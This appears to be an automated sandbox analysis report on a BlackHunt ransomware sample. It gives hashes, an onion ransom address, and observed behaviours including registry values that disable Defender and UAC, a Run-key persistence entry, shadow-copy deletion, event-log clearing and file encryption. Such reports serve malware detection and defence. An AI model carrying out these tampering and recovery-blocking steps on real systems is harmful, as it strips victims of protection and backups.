Analysis
-
max time kernel
147s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 22:30
Static task
static1
Behavioral task
behavioral1
Sample
0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe
Resource
win10v2004-20231215-en
General
-
Target
0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe
-
Size
707KB
-
MD5
11049bbdd6362bdd7446b1cb81cfbc71
-
SHA1
a6acdab3e2081d9e64cb513f3c60ad6ef20beebe
-
SHA256
0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b
-
SHA512
014d04241cca9bd398366059988bc4dde6dde765b25f4aec2cff396134a49d0f17807a87efd1f7f894a093a26c739c9a42a3fad02a218c7f6c15c33f85c6d318
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1n8Jvnh:6uaTmkZJ+naie5OTamgEoKxLWGth
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5148 fsutil.exe 6116 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6088 wevtutil.exe 5536 wevtutil.exe 4340 wevtutil.exe 6112 wevtutil.exe 4400 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6048 bcdedit.exe 6136 bcdedit.exe 4060 bcdedit.exe 4696 bcdedit.exe -
Renames multiple (542) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 704 wbadmin.exe 1724 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Y: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\Z: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\N: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\X: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\T: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\S: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\Q: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\R: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\B: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\K: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\L: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\H: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\V: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\U: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\P: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\G: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\A: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\M: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\O: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened (read-only) \??\J: 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages.properties 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\joni.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\dotnet\shared\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11cryptotoken.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\orb.idl 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\joni.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\PingReset.potm 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\id\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\dotnet\host\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\bcel.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunjce_provider.jar 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfxswt.jar 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jfxrt.jar 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\UnblockSuspend.dot 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\local_policy.jar 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\asm.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Reference Assemblies\#BlackHunt_Private.key 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.hta 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\zlib.md 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.txt 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe File opened for modification C:\Program Files\SaveGet.dib 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2536 5520 WerFault.exe 285 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 844 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3116 vssadmin.exe 4100 vssadmin.exe 1940 vssadmin.exe 5872 vssadmin.exe 4852 vssadmin.exe 2080 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5004 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3952 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeRestorePrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeBackupPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeTakeOwnershipPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeAuditPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeSecurityPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeIncBasePriorityPrivilege 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Token: SeBackupPrivilege 4360 vssvc.exe Token: SeRestorePrivilege 4360 vssvc.exe Token: SeAuditPrivilege 4360 vssvc.exe Token: SeBackupPrivilege 2648 wbengine.exe Token: SeRestorePrivilege 2648 wbengine.exe Token: SeSecurityPrivilege 2648 wbengine.exe Token: SeSecurityPrivilege 6088 wevtutil.exe Token: SeBackupPrivilege 6088 wevtutil.exe Token: SeSecurityPrivilege 6112 wevtutil.exe Token: SeBackupPrivilege 6112 wevtutil.exe Token: SeSecurityPrivilege 4400 wevtutil.exe Token: SeBackupPrivilege 4400 wevtutil.exe Token: SeSecurityPrivilege 5536 wevtutil.exe Token: SeBackupPrivilege 5536 wevtutil.exe Token: SeSecurityPrivilege 4340 wevtutil.exe Token: SeBackupPrivilege 4340 wevtutil.exe Token: SeDebugPrivilege 5004 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2500 wrote to memory of 2748 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 88 PID 2500 wrote to memory of 2748 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 88 PID 2500 wrote to memory of 844 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 90 PID 2500 wrote to memory of 844 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 90 PID 2500 wrote to memory of 2864 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 92 PID 2500 wrote to memory of 2864 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 92 PID 2500 wrote to memory of 3824 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 94 PID 2500 wrote to memory of 3824 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 94 PID 2500 wrote to memory of 2380 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 97 PID 2500 wrote to memory of 2380 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 97 PID 844 wrote to memory of 1040 844 schtasks.exe 171 PID 844 wrote to memory of 1040 844 schtasks.exe 171 PID 2748 wrote to memory of 3528 2748 cmd.exe 96 PID 2748 wrote to memory of 3528 2748 cmd.exe 96 PID 2864 wrote to memory of 4944 2864 cmd.exe 173 PID 2864 wrote to memory of 4944 2864 cmd.exe 173 PID 2500 wrote to memory of 4832 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 102 PID 2500 wrote to memory of 4832 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 102 PID 3824 wrote to memory of 5108 3824 cmd.exe 100 PID 3824 wrote to memory of 5108 3824 cmd.exe 100 PID 2500 wrote to memory of 5072 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 104 PID 2500 wrote to memory of 5072 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 104 PID 2500 wrote to memory of 4444 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 106 PID 2500 wrote to memory of 4444 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 106 PID 2380 wrote to memory of 4812 2380 cmd.exe 105 PID 2380 wrote to memory of 4812 2380 cmd.exe 105 PID 2500 wrote to memory of 4100 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 109 PID 2500 wrote to memory of 4100 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 109 PID 2500 wrote to memory of 2280 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 111 PID 2500 wrote to memory of 2280 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 111 PID 4832 wrote to memory of 2256 4832 cmd.exe 113 PID 4832 wrote to memory of 2256 4832 cmd.exe 113 PID 2500 wrote to memory of 3644 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 114 PID 2500 wrote to memory of 3644 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 114 PID 2500 wrote to memory of 3984 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 115 PID 2500 wrote to memory of 3984 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 115 PID 2500 wrote to memory of 2240 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 117 PID 2500 wrote to memory of 2240 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 117 PID 2500 wrote to memory of 3160 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 119 PID 2500 wrote to memory of 3160 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 119 PID 2500 wrote to memory of 1220 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 122 PID 2500 wrote to memory of 1220 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 122 PID 2500 wrote to memory of 2032 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 126 PID 2500 wrote to memory of 2032 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 126 PID 2500 wrote to memory of 1540 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 127 PID 2500 wrote to memory of 1540 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 127 PID 4444 wrote to memory of 3256 4444 cmd.exe 186 PID 4444 wrote to memory of 3256 4444 cmd.exe 186 PID 4100 wrote to memory of 2080 4100 vssadmin.exe 187 PID 4100 wrote to memory of 2080 4100 vssadmin.exe 187 PID 2500 wrote to memory of 2148 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 131 PID 2500 wrote to memory of 2148 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 131 PID 5072 wrote to memory of 5040 5072 cmd.exe 132 PID 5072 wrote to memory of 5040 5072 cmd.exe 132 PID 2500 wrote to memory of 1028 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 134 PID 2500 wrote to memory of 1028 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 134 PID 2500 wrote to memory of 1816 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 136 PID 2500 wrote to memory of 1816 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 136 PID 2500 wrote to memory of 1584 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 139 PID 2500 wrote to memory of 1584 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 139 PID 2500 wrote to memory of 3376 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 137 PID 2500 wrote to memory of 3376 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 137 PID 2500 wrote to memory of 4916 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 141 PID 2500 wrote to memory of 4916 2500 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe 141 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe"C:\Users\Admin\AppData\Local\Temp\0dc6a939a50833aefe6696192592932ae2d84780778d31691df3cb081d55a34b.exe"1⤵
